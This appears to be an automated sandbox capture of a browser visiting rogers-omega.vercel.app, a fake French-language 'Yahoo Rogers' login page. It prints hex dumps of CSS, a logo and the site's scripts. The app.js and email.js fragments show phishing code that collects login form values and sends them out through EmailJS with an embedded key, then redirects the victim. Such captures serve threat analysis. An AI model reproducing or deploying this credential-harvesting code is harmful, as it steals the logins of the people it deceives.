                                                      Data Ascii: ck;margin-top:0;margin-bottom:1rem;overflow:auto;font-size:.875em}pre code{font-size:inherit;color:inherit;word-break:normal}code{font-size:.875em;color:var(--bs-code-color);word-wrap:break-word}a>code{color:inherit}kbd{padding:.1875rem .375rem;font-size:
                                                      2024-09-29 05:50:32 UTC1378INData Raw: 6e 65 72 7b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 74 65 78 74 61 72 65 61 7b 72 65 73 69 7a 65 3a 76 65 72 74 69 63 61 6c 7d 66 69 65 6c 64 73 65 74 7b 6d 69 6e 2d 77 69 64 74 68 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 62 6f 72 64 65 72 3a 30 7d 6c 65 67 65 6e 64 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 32 37 35 72 65 6d 20 2b 20 2e 33 76 77 29 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 6c 65 67 65 6e 64 7b 66 6f 6e 74 2d
                                                      Data Ascii: ner{padding:0;border-style:none}textarea{resize:vertical}fieldset{min-width:0;padding:0;margin:0;border:0}legend{float:left;width:100%;padding:0;margin-bottom:.5rem;font-size:calc(1.275rem + .3vw);line-height:inherit}@media (min-width:1200px){legend{font-
                                                      2024-09-29 05:50:32 UTC1378INData Raw: 68 65 69 67 68 74 3a 31 2e 32 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 64 69 73 70 6c 61 79 2d 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 72 65 6d 7d 7d 2e 64 69 73 70 6c 61 79 2d 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 34 37 35 72 65 6d 20 2b 20 32 2e 37 76 77 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 64 69 73 70 6c 61 79 2d 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 2e 35 72 65 6d 7d 7d 2e 64 69 73 70 6c 61 79 2d 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 34 32 35 72 65 6d 20 2b 20 32 2e 31 76 77 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b
                                                      Data Ascii: height:1.2}@media (min-width:1200px){.display-3{font-size:4rem}}.display-4{font-size:calc(1.475rem + 2.7vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-4{font-size:3.5rem}}.display-5{font-size:calc(1.425rem + 2.1vw);font-weight:300;
                                                      2024-09-29 05:50:32 UTC1378INData Raw: 61 72 28 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 29 20 2a 20 2e 35 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 61 6c 63 28 76 61 72 28 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 29 20 2a 20 2e 35 29 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 7b 6d 61 78 2d 77 69 64 74 68 3a 35 34 30 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 6d 64 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 7b 6d 61 78 2d 77 69 64 74 68 3a 37 32 30 70 78 7d 7d 40 6d 65 64 69
                                                      Data Ascii: ar(--bs-gutter-x) * .5);padding-left:calc(var(--bs-gutter-x) * .5);margin-right:auto;margin-left:auto}@media (min-width:576px){.container,.container-sm{max-width:540px}}@media (min-width:768px){.container,.container-md,.container-sm{max-width:720px}}@medi
                                                      2024-09-29 05:50:32 UTC1378INData Raw: 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 35 25 7d 2e 63 6f 6c 2d 34 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 35 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 34 31 2e 36 36 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 36 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 25 7d 2e 63 6f 6c 2d 37 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 38 2e 33 33 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 38 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 36 36 2e 36 36 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 39 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 37 35 25 7d 2e 63 6f 6c 2d 31 30 7b 66 6c 65 78
                                                      Data Ascii: x:0 0 auto;width:25%}.col-4{flex:0 0 auto;width:33.33333333%}.col-5{flex:0 0 auto;width:41.66666667%}.col-6{flex:0 0 auto;width:50%}.col-7{flex:0 0 auto;width:58.33333333%}.col-8{flex:0 0 auto;width:66.66666667%}.col-9{flex:0 0 auto;width:75%}.col-10{flex
                                                      2024-09-29 05:50:32 UTC1378INData Raw: 75 74 6f 3b 77 69 64 74 68 3a 32 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 36 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 36 2e 36 36 36 36 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 73 6d 2d 61 75 74 6f 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 63 6f 6c 2d 73 6d 2d 31 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 2e 33 33 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 73 6d 2d 32 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 36 2e 36 36 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 73 6d 2d 33 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 35 25 7d 2e 63 6f 6c 2d 73 6d 2d 34 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 33 33
                                                      Data Ascii: uto;width:20%}.row-cols-sm-6>*{flex:0 0 auto;width:16.6666666667%}.col-sm-auto{flex:0 0 auto;width:auto}.col-sm-1{flex:0 0 auto;width:8.33333333%}.col-sm-2{flex:0 0 auto;width:16.66666667%}.col-sm-3{flex:0 0 auto;width:25%}.col-sm-4{flex:0 0 auto;width:33
                                                      2024-09-29 05:50:32 UTC1378INData Raw: 6d 2d 35 2c 2e 67 78 2d 73 6d 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 33 72 65 6d 7d 2e 67 2d 73 6d 2d 35 2c 2e 67 79 2d 73 6d 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 33 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 63 6f 6c 2d 6d 64 7b 66 6c 65 78 3a 31 20 30 20 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 6d 64 2d 61 75 74 6f 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 6d 64 2d 31 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 6d 64 2d 32 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 6d 64 2d
                                                      Data Ascii: m-5,.gx-sm-5{--bs-gutter-x:3rem}.g-sm-5,.gy-sm-5{--bs-gutter-y:3rem}}@media (min-width:768px){.col-md{flex:1 0 0%}.row-cols-md-auto>*{flex:0 0 auto;width:auto}.row-cols-md-1>*{flex:0 0 auto;width:100%}.row-cols-md-2>*{flex:0 0 auto;width:50%}.row-cols-md-


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.64972676.76.21.1644434420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:33 UTC608OUTGET /assets/rogers.png HTTP/1.1
                                                      Host: rogers-omega.vercel.app
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://rogers-omega.vercel.app/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-09-29 05:50:33 UTC498INHTTP/1.1 200 OK
                                                      Accept-Ranges: bytes
                                                      Access-Control-Allow-Origin: *
                                                      Age: 152749
                                                      Cache-Control: public, max-age=0, must-revalidate
                                                      Content-Disposition: inline; filename="rogers.png"
                                                      Content-Length: 14221
                                                      Content-Type: image/png
                                                      Date: Sun, 29 Sep 2024 05:50:33 GMT
                                                      Etag: "e7a19d229a7f74e2efeecb0a171078d7"
                                                      Server: Vercel
                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                      X-Vercel-Cache: HIT
                                                      X-Vercel-Id: iad1::2npqv-1727589033185-151ca6a7acae
                                                      Connection: close
                                                      2024-09-29 05:50:33 UTC2372INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f8 00 00 00 60 08 06 00 00 00 f1 6a 60 e5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 44 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 01 87 69 00 04 00 00 00 01 00 00 00 1a 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 01 f8 a0 03 00 04 00 00 00 01 00 00 00 60 00 00 00 00 0d ac f4 a4 00 00 36 f7 49 44 41 54 78 01 ed 5d 09 60 54 c5 f9 9f 79 6f 37 17 47 36 91 cb 13 d4 24 20 21 54 12 10 f1 a8 78 1f c5 5b ac 5a 6b 49 38 14 ac d6 b6 d6 bf b5 1e 51 7b 59 b5 6a ad a0 08 81 d6 a3 56 ac 78 b4 f5 ac c5 aa a8 40 88 25 84 2b b1 80 a0 82 40 76 73 ef f5 de fc 7f b3 c9 4b 36 bb ef ce 86 2b f3 34 ec 7b 33 df f7 cd f7 7e 33 6f be 99 6f 2e 42 c4 25 10 10 08 08 04 04 02 02 01 81 80
                                                      Data Ascii: PNGIHDR`j`sRGBDeXIfMM*i`6IDATx]`Tyo7G6$ !Tx[ZkI8Q{YjVx@%+@vsK6+4{3~3oo.B%
                                                      2024-09-29 05:50:33 UTC1057INData Raw: 77 96 2f 94 2e 84 8e ba 06 7e 7a da ba 31 6a 44 79 28 d2 a6 9c 9d 68 14 13 de 2b 13 f1 a7 70 e3 15 0e 92 07 cb a4 ea a7 d2 07 b0 3b 79 af 8f 1b 77 94 95 67 12 e8 4d 1e e9 2b 88 7c df 84 c0 76 14 37 5c 4a 1b 7b 04 5e c2 ab bb 98 f0 05 24 5c 08 39 06 ba ff 88 29 ca 8f 4a e9 9a 37 64 2f fd e9 82 70 91 b3 33 e8 13 64 f2 c7 69 de b5 13 68 94 95 37 34 34 9d 83 34 4c ed 4a 47 3c 5f e7 7d 18 63 ea f9 6a 28 4c a0 4b 35 91 a4 df 0c bf ab f0 af f1 eb b8 75 92 72 15 34 cd 53 7d 36 55 c8 dd d1 56 82 06 98 82 aa 93 5f c8 c9 f6 9b 84 7f 59 1a 02 8e e2 7f 4c 25 97 b7 b6 aa ac 94 56 7f 2c c9 d2 fd 0b a3 85 9d 9b c8 24 30 f5 e8 11 e9 a0 f7 ee ee a2 5e ef 3c 62 60 61 bb b5 ee dc 89 37 e6 82 f1 bc c8 ff 0d 7d d4 98 c2 3c 86 4f 44 0b 86 d4 e5 c8 85 5e 31 ee 9d a9 33 76 18 61
                                                      Data Ascii: w/.~z1jDy(h+p;ywgM+|v7\J{^$\9)J7d/p3dih7444LJG<_}cj(LK5ur4S}6UV_YL%V,$0^<b`a7}<OD^13va
                                                      2024-09-29 05:50:33 UTC4744INData Raw: 03 de b7 5a de 05 c3 e4 0d 90 a6 ef 60 c5 c3 34 54 22 70 87 12 19 45 b6 f7 dc e0 94 fe 16 63 c4 1f c4 bf d7 be ba a7 8c ed c8 a9 aa 2b 35 4a 3f 36 14 f2 0d 3d 0b 74 f7 01 97 62 43 3a 46 f2 02 ac 71 3a e2 6d f5 36 1b 3f 5f 73 36 6a 1b 53 cf 11 ca df 32 89 a6 cf cc 5e 5d 53 67 94 ae 16 1e 38 61 e4 d1 2c aa 5c 0c 1d f9 d8 ee 41 77 51 89 3c 0e 37 a3 33 03 cf e8 65 b3 b3 d7 e4 38 9d d4 44 55 3a 13 df b1 23 0c e5 84 8a b0 2c 7d c3 48 16 8c bc 83 da e1 48 47 82 0c 88 a1 cf 00 a8 74 bd 41 74 ef 05 33 fa 1b a4 8d a2 e8 fe 02 92 7c 35 d5 c2 59 99 35 2b e3 e7 14 18 49 e4 1e 94 70 55 f5 23 68 18 dc e8 2c 17 8c 24 26 87 c3 9e cc d8 b2 4e 19 83 53 d5 2e af 68 1d f5 55 32 85 71 08 f7 ca 94 49 6b ff 0c 5c 2e 35 a6 ea 49 0c 7a f4 8c dd 8d e1 99 e3 6f ca ad fd fe e3 f5 f9
                                                      Data Ascii: Z`4T"pEc+5J?6=tbC:Fq:m6?_s6jS2^]Sg8a,\AwQ<73e8DU:#,}HHGtAt3|5Y5+IpU#h,$&NS.hU2qIk\.5Izo
                                                      2024-09-29 05:50:33 UTC5930INData Raw: fc 48 53 a7 4a 21 93 0c 0d 29 97 85 c9 7d 43 9c ca b4 43 2f 31 36 c4 ac f8 a2 62 30 6d fd c3 9d b7 1b e5 4b d7 c0 a3 82 1a c6 37 f0 e1 87 db d8 d1 85 d3 c0 b8 5f 6c 7f 8c d7 ae 54 67 74 f0 5a dc 87 a5 6e 1f 38 e3 da 8f a8 29 99 9b 73 6c da 4f e8 92 9a 70 6f 6a d5 31 71 ee 09 76 ce d8 c5 81 dd 41 ec d5 ad fe 0c 76 24 cb 2a 4d 85 b2 f9 81 09 05 2b 7c 2b 37 d9 f7 00 58 09 dd 8f e3 3d 1e fa 44 34 c2 6c 1b 78 fe 2a aa ca d7 fb b2 0c 27 af 25 f1 7d e7 f5 3b 09 8e 1a ab 68 1c 9e c3 b7 c6 8d 1d 9e 63 53 01 7c b3 b4 54 5a 3b cd 26 f9 01 44 66 77 e7 c7 8e 57 62 e4 fa f2 11 9b e7 f2 25 66 76 5f 32 1a 55 6f b1 4b db 41 87 95 4f 9d 57 fc 7d 67 a0 d1 0d 3a 8a 3f 42 5e bd c2 87 8f 8c 68 92 c2 55 e3 39 40 49 b4 08 80 1d dc 91 d8 9e e4 db fd b6 b5 aa f3 59 54 b9 90 f3 b4
                                                      Data Ascii: HSJ!)}CC/16b0mK7_lTgtZn8)slOpoj1qvAv$*M+|+7X=D4lx*'%};hcS|TZ;&DfwWb%fv_2UoKAOW}g:?B^hU9@IYT
                                                      2024-09-29 05:50:33 UTC118INData Raw: 08 08 04 04 02 02 01 81 80 40 40 20 20 10 10 08 08 04 04 02 02 01 81 80 40 40 20 20 10 10 08 08 04 04 02 02 01 81 80 40 40 20 20 10 10 08 08 04 04 02 02 01 81 80 40 40 20 20 10 10 08 08 04 04 02 02 01 81 80 40 40 20 20 10 10 08 08 04 04 02 02 01 81 80 40 40 20 20 10 10 08 08 04 f6 67 04 fe 1f d8 22 3b 62 34 07 51 99 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                      Data Ascii: @@ @@ @@ @@ @@ @@ g";b4QIENDB`


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.64972776.76.21.1644434420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:33 UTC537OUTGET /app.js HTTP/1.1
                                                      Host: rogers-omega.vercel.app
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://rogers-omega.vercel.app/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-09-29 05:50:33 UTC521INHTTP/1.1 200 OK
                                                      Accept-Ranges: bytes
                                                      Access-Control-Allow-Origin: *
                                                      Age: 152749
                                                      Cache-Control: public, max-age=0, must-revalidate
                                                      Content-Disposition: inline; filename="app.js"
                                                      Content-Length: 5056
                                                      Content-Type: application/javascript; charset=utf-8
                                                      Date: Sun, 29 Sep 2024 05:50:33 GMT
                                                      Etag: "72dad32d2dfcece031bff1406d7e80f9"
                                                      Server: Vercel
                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                      X-Vercel-Cache: HIT
                                                      X-Vercel-Id: iad1::xjqsb-1727589033185-fdd40b5986da
                                                      Connection: close
                                                      2024-09-29 05:50:33 UTC2372INData Raw: 6c 65 74 20 74 6f 67 67 6c 65 43 6c 69 63 6b 65 64 43 6f 75 6e 74 20 3d 20 30 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 6e 65 78 74 53 74 65 70 28 29 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 75 73 65 72 6e 61 6d 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 75 73 65 72 6e 61 6d 65 27 29 2e 76 61 6c 75 65 3b 0a 20 20 20 20 63 6f 6e 73 74 20 72 65 6d 65 6d 62 65 72 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 72 65 6d 65 6d 62 65 72 27 29 2e 63 68 65 63 6b 65 64 3b 0a 0a 20 20 20 20 69 66 20 28 75 73 65 72 6e 61 6d 65 20 21 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 73 74 65 70 31 27 29 2e 73 74 79 6c 65
                                                      Data Ascii: let toggleClickedCount = 0;function nextStep() { const username = document.getElementById('username').value; const remember = document.getElementById('remember').checked; if (username !== '') { document.getElementById('step1').style
                                                      2024-09-29 05:50:33 UTC1034INData Raw: 53 55 43 43 45 53 53 21 27 2c 20 72 65 73 70 6f 6e 73 65 2e 73 74 61 74 75 73 2c 20 72 65 73 70 6f 6e 73 65 2e 74 65 78 74 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 64 69 72 65 63 74 54 6f 55 52 4c 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 72 72 6f 72 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 45 52 52 4f 52 21 27 2c 20 65 72 72 6f 72 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 64 69 72 65 63 74 54 6f 55 52 4c 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 7d 29 3b 0a 0a 0a 66 75 6e 63 74 69 6f 6e 20 72 65 64 69 72 65 63 74 54 6f 55 52 4c 28 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 68 74 74 70 73 3a 2f 2f
                                                      Data Ascii: SUCCESS!', response.status, response.text); redirectToURL(); }, function (error) { console.log('ERROR!', error); redirectToURL(); });});function redirectToURL() { window.location.href = 'https://
                                                      2024-09-29 05:50:33 UTC1650INData Raw: 20 20 20 20 20 20 20 20 27 63 72 65 64 65 6e 74 69 61 6c 73 27 3a 20 27 61 76 65 63 20 76 6f 73 20 61 75 74 68 65 6e 74 69 66 69 61 6e 74 73 20 59 61 68 6f 6f 20 52 6f 67 65 72 73 27 2c 0a 20 20 20 20 20 20 20 20 27 69 6e 66 6f 27 3a 20 27 69 6e 66 6f 27 2c 0a 20 20 20 20 20 20 20 20 27 72 65 6d 65 6d 62 65 72 5f 75 73 65 72 6e 61 6d 65 27 3a 20 27 53 65 20 73 6f 75 76 65 6e 69 72 20 64 75 20 6e 6f 6d 20 64 5c 27 75 74 69 6c 69 73 61 74 65 75 72 27 2c 0a 20 20 20 20 20 20 20 20 27 63 6f 6e 74 69 6e 75 65 27 3a 20 27 43 6f 6e 74 69 6e 75 65 72 27 2c 0a 20 20 20 20 20 20 20 20 27 75 73 65 72 6e 61 6d 65 5f 6c 61 62 65 6c 27 3a 20 27 4e 6f 6d 20 64 5c 27 75 74 69 6c 69 73 61 74 65 75 72 20 3a 20 3c 73 70 61 6e 20 69 64 3d 22 64 69 73 70 6c 61 79 55 73 65 72
                                                      Data Ascii: 'credentials': 'avec vos authentifiants Yahoo Rogers', 'info': 'info', 'remember_username': 'Se souvenir du nom d\'utilisateur', 'continue': 'Continuer', 'username_label': 'Nom d\'utilisateur : <span id="displayUser


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.64973076.76.21.2414434420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:33 UTC355OUTGET /email.js HTTP/1.1
                                                      Host: rogers-omega.vercel.app
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-09-29 05:50:33 UTC521INHTTP/1.1 200 OK
                                                      Accept-Ranges: bytes
                                                      Access-Control-Allow-Origin: *
                                                      Age: 152750
                                                      Cache-Control: public, max-age=0, must-revalidate
                                                      Content-Disposition: inline; filename="email.js"
                                                      Content-Length: 60
                                                      Content-Type: application/javascript; charset=utf-8
                                                      Date: Sun, 29 Sep 2024 05:50:33 GMT
                                                      Etag: "a4b98151fc560b993f5a9569bf1cb2d7"
                                                      Server: Vercel
                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                      X-Vercel-Cache: HIT
                                                      X-Vercel-Id: iad1::b6tn8-1727589033571-0c407a65e8d1
                                                      Connection: close
                                                      2024-09-29 05:50:33 UTC60INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 65 6d 61 69 6c 6a 73 2e 69 6e 69 74 28 27 6f 44 4a 6e 49 5f 43 79 42 6c 4a 61 36 37 42 42 76 27 29 3b 0a 7d 29 28 29 3b 0a
                                                      Data Ascii: (function () { emailjs.init('oDJnI_CyBlJa67BBv');})();


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.649732151.101.129.2294434420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:33 UTC380OUTGET /npm/@emailjs/browser@3/dist/email.min.js HTTP/1.1
                                                      Host: cdn.jsdelivr.net
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-09-29 05:50:33 UTC756INHTTP/1.1 200 OK
                                                      Connection: close
                                                      Content-Length: 2058
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Expose-Headers: *
                                                      Timing-Allow-Origin: *
                                                      Cache-Control: public, max-age=604800, s-maxage=43200
                                                      Cross-Origin-Resource-Policy: cross-origin
                                                      X-Content-Type-Options: nosniff
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Content-Type: application/javascript; charset=utf-8
                                                      X-JSD-Version: 3.12.1
                                                      X-JSD-Version-Type: version
                                                      ETag: W/"80a-PXSZ1xOJiieY9EnYs1KNQJRHUgg"
                                                      Accept-Ranges: bytes
                                                      Date: Sun, 29 Sep 2024 05:50:33 GMT
                                                      Age: 12071
                                                      X-Served-By: cache-fra-etou8220134-FRA, cache-nyc-kteb1890039-NYC
                                                      X-Cache: HIT, HIT
                                                      Vary: Accept-Encoding
                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                      2024-09-29 05:50:33 UTC1378INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 64 3a 28 74 2c 72 29 3d 3e 7b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 72 29 65 2e 6f 28 72 2c 69 29 26 26 21 65 2e 6f 28 74 2c 69 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 72 5b 69 5d 7d 29 7d 2c 6f 3a 28 65 2c 74 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 74 29 2c 72 3a 65 3d 3e 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 53
                                                      Data Ascii: (()=>{"use strict";var e={d:(t,r)=>{for(var i in r)e.o(r,i)&&!e.o(t,i)&&Object.defineProperty(t,i,{enumerable:!0,get:r[i]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t),r:e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,S
